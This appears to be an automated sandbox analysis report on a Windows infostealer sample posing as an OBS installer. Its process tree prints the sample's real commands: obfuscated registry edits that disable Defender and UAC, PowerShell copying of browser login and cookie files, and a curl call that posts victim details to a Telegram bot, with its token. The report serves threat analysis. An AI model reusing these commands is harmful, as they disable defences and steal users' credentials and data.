Resubmissions
  25-01-2023 07:44  230125-jktlcaha3x  score 10

Analysis
  max time kernel: 150s
  max time network: 130s
  platform: windows10-2004_x64
  resource: win10v2004-20220901-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 25-01-2023 07:44

Static task: static1
Behavioral task: behavioral1
  Sample: t2_sup5.exe
  Resource: win7-20220812-en

General
  Target: t2_sup5.exe
  Size: 23.2MB
  MD5: 0c952979e2d76f8ec17ff34a8023b82b
  SHA1: 7406c03065315f5dd6d84e9443c2f0e92a666c0a
  SHA256: 615beea238930be9e92faf8e7394d59d65000beb9728bb8b38f6b31c83e435e8
  SHA512: 6f6cb2e2606602a74a554b610c4baeb0fb6fe8b310429be330e08e6f1102ea95f36fc80fd981402e40fef652a1da5909eeb154cd4dcbd841bdbf9a0a1834278b
  SSDEEP: 393216:RXZVmGOIszfE1/giQkQJ/y2OFsaetMhSEiCjjngIlGZi4zym8nmjKAO9wV3ajcv1:NOm/giQP/yWaeiSEikjnRYjzMmW99IFP
Malware Config
Signatures

Modifies Windows Defender notification settings
  Processes (description | ioc | process):
    Key created | \REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications | reg.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications | reg.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1" | reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (10 IoCs)
  Processes (description | pid | process | target process):
    PID 4184 created 2724 | 4184 | svchost.exe | r.exe
    PID 4184 created 3900 | 4184 | svchost.exe | r.exe
    PID 4184 created 748 | 4184 | svchost.exe | r.exe
    PID 4184 created 3392 | 4184 | svchost.exe | r.exe
    PID 4184 created 1876 | 4184 | svchost.exe | obs64.exe
    PID 4184 created 1004 | 4184 | svchost.exe | r.exe
    PID 4184 created 4856 | 4184 | svchost.exe | r.exe
    PID 4184 created 3608 | 4184 | svchost.exe | r.exe
    PID 4184 created 4160 | 4184 | svchost.exe | r.exe
    PID 4184 created 4956 | 4184 | svchost.exe | r.exe

UAC bypass
  Processes (description | ioc | process):
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | reg.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0" | reg.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | reg.exe

Windows security bypass
  Processes (description | ioc | process):
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions | reg.eXe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\dLl = "0" | reg.eXe
    Key created | \REGISTRY\MACHINE\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns | reG.exe
    Key created | \REGISTRY\MACHINE\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS | reg.eXe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\PathS\C:\Windows\sYSTeM32\drIvers\etC\hOsts = "0" | reg.eXe
    Key created | \REGISTRY\MACHINE\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions | reg.eXe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\sCr = "0" | reG.exe
    Key created | \REGISTRY\MACHINE\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs | reG.eXe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\cMd = "0" | reG.eXe
    Key created | \REGISTRY\MACHINE\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns | reg.eXe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\exe = "0" | reg.eXe

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Disables use of System Restore points (1 TTPs)

Executes dropped EXE (23 IoCs)
  Processes (pid | process):
    4592 | t2_sup5.tmp
    4752 | t2_sup5.tmp
    2724 | r.exe
    3900 | r.exe
    748 | r.exe
    3240 | r.exe
    3392 | r.exe
    1876 | obs64.exe
    3560 | r.exe
    1004 | r.exe
    4856 | r.exe
    3704 | r.exe
    3608 | r.exe
    4160 | r.exe
    1712 | r.exe
    4956 | r.exe
    3480 | r.exe
    3516 | obs64.exe
    4308 | obs64.tmp
    1876 | obs64.exe
    1284 | obs64.tmp
    3552 | obs64.scr
    2180 | obs64.sCr

Possible privilege escalation attempt (5 IoCs)
  Processes (pid | process):
    3352 | icacls.exe
    3268 | icacls.exe
    4684 | takeown.exe
    4728 | icacls.exe
    3268 | icacls.exe

Sets file to hidden (1 TTPs, 4 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  Processes (pid | process):
    4032 | attrib.exe
    4352 | attrib.exe
    2424 | attrib.exe
    3148 | attrib.exe

Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | t2_sup5.tmp
    Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | obs64.tmp
    Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | obs64.sCr

Drops startup file (1 IoCs)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk | t2_sup5.tmp

Loads dropped DLL (2 IoCs)
  Processes (pid | process):
    3676 | rundll32.exe
    2064 | rundll32.exe

Modifies file permissions (1 TTPs, 5 IoCs)
  Processes (pid | process):
    3268 | icacls.exe
    3352 | icacls.exe
    4684 | takeown.exe
    4728 | icacls.exe
    3268 | icacls.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow | ioc):
    11 | ipINFO.io

Suspicious use of NtSetInformationThreadHideFromDebugger (6 IoCs)
  Processes (pid | process):
    2064 | rundll32.exe (x2)
    3552 | obs64.scr (x4)

Suspicious use of SetThreadContext (1 IoCs)
  Processes (description | pid | process | target process):
    PID 3552 set thread context of 2180 | 3552 | obs64.scr | obs64.sCr

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (pid | process):
    3020 | vssadmin.exe

Kills process with taskkill (3 IoCs)
  Processes (pid | process):
    3304 | taskkill.exe
    2960 | taskkill.exe
    1264 | taskkill.exe

Modifies data under HKEY_USERS (25 IoCs)
  All keys below are under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  Processes (description | ioc | process):
    Set value (int) | ZoneMap\UNCAsIntranet = "1" | r.exe
    Set value (int) | ZoneMap\ProxyBypass = "1" | r.exe
    Set value (int) | ZoneMap\ProxyBypass = "1" | r.exe
    Set value (int) | ZoneMap\AutoDetect = "0" | r.exe
    Key created | ZoneMap\ | r.exe
    Set value (int) | ZoneMap\IntranetName = "1" | r.exe
    Set value (int) | ZoneMap\UNCAsIntranet = "1" | r.exe
    Set value (int) | ZoneMap\UNCAsIntranet = "1" | r.exe
    Key created | ZoneMap\ | r.exe
    Set value (int) | ZoneMap\ProxyBypass = "1" | r.exe
    Set value (int) | ZoneMap\AutoDetect = "0" | r.exe
    Key created | ZoneMap\ | r.exe
    Set value (int) | ZoneMap\IntranetName = "1" | r.exe
    Set value (int) | ZoneMap\IntranetName = "1" | r.exe
    Set value (int) | ZoneMap\ProxyBypass = "1" | r.exe
    Set value (int) | ZoneMap\IntranetName = "1" | r.exe
    Set value (int) | ZoneMap\AutoDetect = "0" | r.exe
    Key created | ZoneMap\ | r.exe
    Set value (int) | ZoneMap\ProxyBypass = "1" | r.exe
    Set value (int) | ZoneMap\IntranetName = "1" | r.exe
    Set value (int) | ZoneMap\AutoDetect = "0" | r.exe
    Set value (int) | ZoneMap\UNCAsIntranet = "1" | r.exe
    Set value (int) | ZoneMap\UNCAsIntranet = "1" | r.exe
    Set value (int) | ZoneMap\AutoDetect = "0" | r.exe
    Key created | ZoneMap\ | r.exe

Suspicious behavior: EnumeratesProcesses (56 IoCs)
  Processes (pid | process, consecutive repeats collapsed):
    4752 | t2_sup5.tmp (x2)
    2064 | rundll32.exe (x4)
    2724 | r.exe (x4)
    3900 | r.exe (x4)
    748 | r.exe (x4)
    3392 | r.exe (x4)
    1876 | obs64.exe (x4)
    1004 | r.exe (x4)
    4856 | r.exe (x4)
    3608 | r.exe (x4)
    4160 | r.exe (x4)
    4956 | r.exe (x4)
    1284 | obs64.tmp (x2)
    3552 | obs64.scr (x4)
    4836 | powershell.exe (x2)
    3304 | powershell.exe (x2)

Suspicious use of AdjustPrivilegeToken (46 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1264 | taskkill.exe
    Token: SeDebugPrivilege | 2724 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 2724 | r.exe
    Token: SeIncreaseQuotaPrivilege | 2724 | r.exe
    Token: 0 | 2724 | r.exe
    Token: SeTcbPrivilege | 4184 | svchost.exe
    Token: SeTcbPrivilege | 4184 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 4684 | takeown.exe
    Token: SeDebugPrivilege | 3304 | taskkill.exe
    Token: SeDebugPrivilege | 3900 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 3900 | r.exe
    Token: SeIncreaseQuotaPrivilege | 3900 | r.exe
    Token: SeDebugPrivilege | 748 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 748 | r.exe
    Token: SeIncreaseQuotaPrivilege | 748 | r.exe
    Token: 0 | 748 | r.exe
    Token: SeDebugPrivilege | 3392 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 3392 | r.exe
    Token: SeIncreaseQuotaPrivilege | 3392 | r.exe
    Token: SeDebugPrivilege | 1876 | obs64.exe
    Token: SeAssignPrimaryTokenPrivilege | 1876 | obs64.exe
    Token: SeIncreaseQuotaPrivilege | 1876 | obs64.exe
    Token: 0 | 1876 | obs64.exe
    Token: SeDebugPrivilege | 1004 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 1004 | r.exe
    Token: SeIncreaseQuotaPrivilege | 1004 | r.exe
    Token: SeDebugPrivilege | 4856 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 4856 | r.exe
    Token: SeIncreaseQuotaPrivilege | 4856 | r.exe
    Token: 0 | 4856 | r.exe
    Token: SeDebugPrivilege | 3608 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 3608 | r.exe
    Token: SeIncreaseQuotaPrivilege | 3608 | r.exe
    Token: SeDebugPrivilege | 4160 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 4160 | r.exe
    Token: SeIncreaseQuotaPrivilege | 4160 | r.exe
    Token: 0 | 4160 | r.exe
    Token: SeDebugPrivilege | 4956 | r.exe
    Token: SeAssignPrimaryTokenPrivilege | 4956 | r.exe
    Token: SeIncreaseQuotaPrivilege | 4956 | r.exe
    Token: SeBackupPrivilege | 3896 | vssvc.exe
    Token: SeRestorePrivilege | 3896 | vssvc.exe
    Token: SeAuditPrivilege | 3896 | vssvc.exe
    Token: SeDebugPrivilege | 2960 | taskkill.exe
    Token: SeDebugPrivilege | 4836 | powershell.exe
    Token: SeDebugPrivilege | 3304 | powershell.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes (pid | process):
    4752 | t2_sup5.tmp
    1284 | obs64.tmp

Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes (pid | process):
    3552 | obs64.scr

Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description | pid | process | target process, consecutive repeats collapsed):
    PID 4952 wrote to memory of 4592 | 4952 | t2_sup5.exe | t2_sup5.tmp (x3)
    PID 4592 wrote to memory of 3408 | 4592 | t2_sup5.tmp | cmd.exe (x3)
    PID 4592 wrote to memory of 5096 | 4592 | t2_sup5.tmp | t2_sup5.exe (x3)
    PID 3408 wrote to memory of 1264 | 3408 | cmd.exe | taskkill.exe (x3)
    PID 5096 wrote to memory of 4752 | 5096 | t2_sup5.exe | t2_sup5.tmp (x3)
    PID 4752 wrote to memory of 3676 | 4752 | t2_sup5.tmp | rundll32.exe (x3)
    PID 3676 wrote to memory of 2064 | 3676 | rundll32.exe | rundll32.exe (x2)
    PID 4752 wrote to memory of 4440 | 4752 | t2_sup5.tmp | cmd.exe (x3)
    PID 3968 wrote to memory of 376 | 3968 | reg.eXe | cmd.exe (x2)
    PID 4440 wrote to memory of 2724 | 4440 | cmd.exe | r.exe (x3)
    PID 376 wrote to memory of 5000 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 1828 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 372 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 4040 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 1916 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 3564 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 1988 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 4684 | 376 | cmd.exe | takeown.exe (x2)
    PID 376 wrote to memory of 3268 | 376 | cmd.exe | icacls.exe (x2)
    PID 376 wrote to memory of 3304 | 376 | cmd.exe | taskkill.exe (x2)
    PID 4184 wrote to memory of 3900 | 4184 | svchost.exe | r.exe (x3)
    PID 376 wrote to memory of 3352 | 376 | cmd.exe | icacls.exe (x2)
    PID 4440 wrote to memory of 748 | 4440 | cmd.exe | r.exe (x3)
    PID 376 wrote to memory of 4176 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 3828 | 376 | cmd.exe | reg.exe (x2)
    PID 376 wrote to memory of 984 | 376 | cmd.exe | reg.exe (x2)
    PID 4184 wrote to memory of 3240 | 4184 | svchost.exe | r.exe (x2)

Views/modifies file attributes (1 TTPs, 4 IoCs)
  Processes (pid | process):
    4352 | attrib.exe
    2424 | attrib.exe
    3148 | attrib.exe
    4032 | attrib.exe

Processes (process tree: [n] is the nesting depth, followed by the image path, the command line and the matched signatures)

[1] C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmp
      cmd: "C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmp" /SL5="$A0046,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /f /im obs64.scr
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\is-N7AH8.tmp\t2_sup5.tmp
          cmd: "C:\Users\Admin\AppData\Local\Temp\is-N7AH8.tmp\t2_sup5.tmp" /SL5="$B0044,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-
          - Executes dropped EXE
          - Drops startup file
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\rundll32.exe
            cmd: "C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\rundll32.exe
              cmd: "C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
              - Loads dropped DLL
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\.cmd""
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
              cmd: r.exe /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
            [7] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
                  - Executes dropped EXE
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\reG.eXe
                    cmd: "C:\Windows\system32\reG.eXe" add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
              cmd: r.eXe /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
                  - Executes dropped EXE
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\reg.eXe
                    cmd: "C:\Windows\system32\reg.eXe" Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
              cmd: r.exe /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
                  - Executes dropped EXE
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\reg.eXe
                    cmd: "C:\Windows\system32\reg.eXe" add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
                    - Windows security bypass
                    - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\g.cmd""
          [6] C:\Windows\SysWOW64\cmd.exe
              cmd: C:\Windows\system32\cmd.exe /c cUrL -s ipINFO.io/Ip
          [6] C:\Windows\SysWOW64\cmd.exe
              cmd: C:\Windows\system32\cmd.exe /c cuRL -s IPINfo.Io/city
            [7] C:\Windows\SysWOW64\curl.exe
                cmd: cuRL -s IPINfo.Io/city
          [6] C:\Windows\SysWOW64\cmd.exe
              cmd: C:\Windows\system32\cmd.exe /c cUrl -s IPiNfo.io/country
            [7] C:\Windows\SysWOW64\curl.exe
                cmd: cUrl -s IPiNfo.io/country
          [6] C:\Windows\SysWOW64\curl.exe
              cmd: curl -s -k -d chat_id=1476438440 --data-urlencode "text=Sup5 (21.01.23), File Name: "t2_sup5.exe", IP: 154.61.71.51, Country: NL, City: Aalsmeerderbrug, UserName: Admin, Date: Wed 01/25/2023, 7:44:26" "https://api.telegram.org/bot5705253590:AAFVFnRR0s9sfoSDjSj6MrjbXJ5e1ipXBUM/sendmessage"
          [6] C:\Windows\SysWOW64\attrib.exe
              cmd: AttrIb +s +H C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmD
              - Sets file to hidden
              - Views/modifies file attributes
          [6] C:\Windows\SysWOW64\attrib.exe
              cmd: AttrIB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs
              - Sets file to hidden
              - Views/modifies file attributes
        [5] C:\tmp\obs64.exe
            cmd: "C:\tmp\obs64.exe"
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmp
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmp" /SL5="$301CC,16149264,140800,C:\tmp\obs64.exe"
              - Executes dropped EXE
              - Checks computer location settings
            [7] C:\tmp\obs64.exe
                cmd: "C:\tmp\obs64.exe" /verysilent /sp-
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmp
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmp" /SL5="$401CC,16149264,140800,C:\tmp\obs64.exe" /verysilent /sp-
                  - Executes dropped EXE
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of FindShellTrayWindow
                [9] C:\tmp\obs64.scr
                    cmd: "C:\tmp\obs64.scr"
                    - Executes dropped EXE
                    - Suspicious use of NtSetInformationThreadHideFromDebugger
                    - Suspicious use of SetThreadContext
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of SetWindowsHookEx
                  [10] C:\tmp\obs64.sCr
                      cmd: "C:\tmp\obs64.sCr"
                      - Executes dropped EXE
                      - Checks computer location settings
                    [11] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\z7fd3w5dvi22240627656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\vrodf8gv240627656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\ygvf9fsgb240627750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ts29wog7240627750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\zkmttbs67240628031.tmp\" -Force"
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                    [11] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\l83srfk56br1240640656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\rhcd5jjuq9r240640656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\7qzs86n6k5va4byd240640750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\zb0ng5pb8m3ia6u240640750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\r7a29ki0240641031.tmp\" -Force"
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
        [5] C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\d.cmd""
          [6] C:\Windows\System32\Conhost.exe
              cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[1] C:\Windows\System32\WScript.exe
    cmd: "C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c ""C:\TMP\.CMD" "
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f
        - Modifies Windows Defender notification settings
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f
